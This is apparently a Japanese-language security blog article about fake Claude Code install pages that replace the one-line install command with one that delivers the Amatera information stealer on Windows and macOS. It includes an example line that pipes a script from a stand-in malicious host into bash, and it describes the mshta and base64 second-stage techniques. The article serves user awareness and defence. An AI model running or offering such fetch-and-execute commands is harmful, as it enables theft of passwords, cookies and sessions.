AIニュース詐欺

偽のClaude CodeインストールページがWindows Mac 標的に情報窃取型マルウェアを拡散

ピーター・アーンツ| 2026年3月9日
クロード ロゴ

攻撃者はClaude Codeなどの人気ツールのインストールページを複製し、「ワンライナー」インストールコマンドをマルウェアとすり替える。主な目的はパスワード、クッキー、セッション、開発者環境へのアクセス権を窃取することである。

現代のインストールガイドでは、単一のコマンドをコピーするように指示することがよくあります。 curl https://malware-site | bash ターミナルに打ち込んでEnterを押す。この習慣がウェブサイトをリモコンに変える:そのURLに存在するスクリプトは、あなたの権限(多くの場合管理者権限)で実行される。

研究者らは、攻撃者がこのワークフローを悪用する手法を突き止めた。攻撃者はすべての設定を同一に保ち、たった1行のコードが実際に接続する先だけを変更するのだ。AIや開発ツールを使い始めたばかりの非専門ユーザーにとって、この手法はごく普通に見えるため、警戒心が緩んでしまう。

しかし、これは基本的に「このドメインを信頼する」ということに帰着します。そして、それが確実に信頼できると確信していない限り、それは良い考えではありません。

大抵はこんな流れだ。誰かが「Claude Code インストール」や「Claude Code CLI」を検索すると、上位に表示されたスポンサーリンクのURLが信憑性がありそうに見えるため、深く考えずにクリックしてしまう。

しかしその広告は、複製されたドキュメントやダウンロードページへ誘導する:同じロゴ、同じサイドバー、同じテキスト、そしてインストールコマンドの横にはおなじみの「コピー」ボタンが配置されている。多くの場合、その偽ページ上の他のリンクをクリックすると、静かに本物のベンダーサイトへリダイレクトされるため、他に不審な点は見当たらない。

ClickFix攻撃と同様に、この手法はInstallFixと呼ばれる。ユーザーは偽りの口実のもと、自身のマシンを感染させるコードを実行し、ペイロードは通常情報窃取型マルウェアである。

これらのクロードコードをテーマにしたInstallFixケースの主なペイロードは、Amateraと呼ばれる情報窃取マルウェアである。保存されたパスワード、クッキー、セッショントークン、自動入力データなどのブラウザデータや、攻撃者がデバイスをプロファイリングするのに役立つ一般的なシステム情報に焦点を当てている。これにより、実際のパスワードを必要とせずにウェブセッションを乗っ取り、クラウドダッシュボードや内部管理者パネルにログインすることが可能となる。一部の報告では、暗号通貨ウォレットやその他の高価値アカウントへの関心も指摘されている。

Windows Mac

研究者らが発見したクロードコードベースのキャンペーンは、Windows Mac の両方のMac 標的にする能力を備えていた。

macOSでは、悪意のあるワンライナーは通常、攻撃者が制御するドメインから第二段階のスクリプトを取得する。このスクリプトは一見すると無害に見えるよう、base64で難読化されていることが多い。その後、そのスクリプトはさらに別のドメインからバイナリをダウンロードして実行する。実行前に属性を削除し、実行可能状態にする。 

Windows、このコマンドがプロセスを生成しているのが確認されている cmd.exeその後、呼び出す mshta.exe リモートURLを介して。これにより、マルウェアのロジックは明らかなランダムな実行ファイルではなく、信頼されたMicrosoftバイナリとして動作します。いずれの場合も、画面上に目立った変化は現れません:ユーザーは単なるツールのインストールを完了したと思い込む一方で、実際のペイロードはバックグラウンドで静かに動作を開始します。

安全に過ごすには

ClickFixやInstallFixが蔓延している現状——そしてこれらがすぐに消え去る気配もない——警戒心を持ち、注意深く、そして保護されることが重要です。

  • 落ち着いて。ウェブページやプロンプトの指示を急いで実行しないでください。特に、デバイスでコマンドを実行したりコードをコピー&ペーストしたりするよう求められた場合は注意が必要です。コマンドを実行する前に、その動作内容を分析してください。
  • 信頼できないソースからのコマンドやスクリプトの実行は避けてください。ソースを信頼し、その動作の目的を理解していない限り、ウェブサイト、メール、メッセージからコピーしたコードやコマンドを絶対に実行しないでください。指示は独自に確認してください。ウェブサイトでコマンドの実行や技術的な操作を指示された場合は、公式ドキュメントで確認するか、サポートに連絡してから進めてください。
  • コマンドのコピー&ペースト使用を制限してください。コピー&ペーストではなく手動でコマンドを入力することで、コピーしたテキストに隠された悪意のあるペイロードを知らずに実行するリスクを低減できます。
  • デバイスを保護してください。最新のリアルタイムマルウェア対策ソリューションとウェブ保護機能を使用してください
  • 進化する攻撃手法について学びましょう。攻撃が予期せぬ経路から発生し、進化し続ける可能性があることを理解することが警戒心を維持する助けとなります。引き続き当ブログをご覧ください!

プロの秘訣:無料の Malwarebytes Browser Guard 拡張機能は、ウェブサイトがあなたのクリップボードに何かをコピーしようとすると警告してくれることをご存知ですか?

脅威を報告するだけでなく、取り除く

サイバーセキュリティのリスクは、ヘッドラインを超えて広がるべきではありません。今すぐMalwarebytes ダウンロードして、デバイスに脅威を持ち込まないようにしましょう。

著者について

ピーテル・アルンツ

ピーテル・アルンツ

マルウェアインテリジェンス研究者

コンシューマー・セキュリティ部門で12年連続マイクロソフトMVP。4ヶ国語を操る。リッチなマホガニーと革張りの本の匂い。

最新記事

どのように
ノートパソコンでオンラインクイズを受ける男性

クイズサイトはユーザーを騙して不要なブラウザ通知を有効にさせる

3月9, 2026

クイズは単なるおとりだ。真の目的は、ブラウザ通知を送信する許可を得ることにある。その通知は後々、広告や詐欺、怪しいプロモーションに悪用される可能性がある。

ニュース
安全保障週間

セキュリティ週間(3月2日~3月8日)

3月9, 2026

2026年3月2日から3月8日までの週に扱ったトピックの一覧

ポッドキャスト
イラストの南京錠がマイクスタンドに取り付けられ、そこから音波が発せられる。

リング・ドアベルズ:隣人を見かけませんか?(ロック・アンド・コード S07E05)

3月8, 2026

今週の「Lock and Code」ポッドキャストでは、マシュー・グアリリア氏をゲストに迎え、Ringスマートドアベルと、それらが構築する監視ネットワークについて語ります。

投稿者アイコン

投稿者

脅威センターのアイコン

スレットセンター

ポッドキャスト・アイコン

ポッドキャスト

用語集アイコン

用語集

詐欺アイコン

詐欺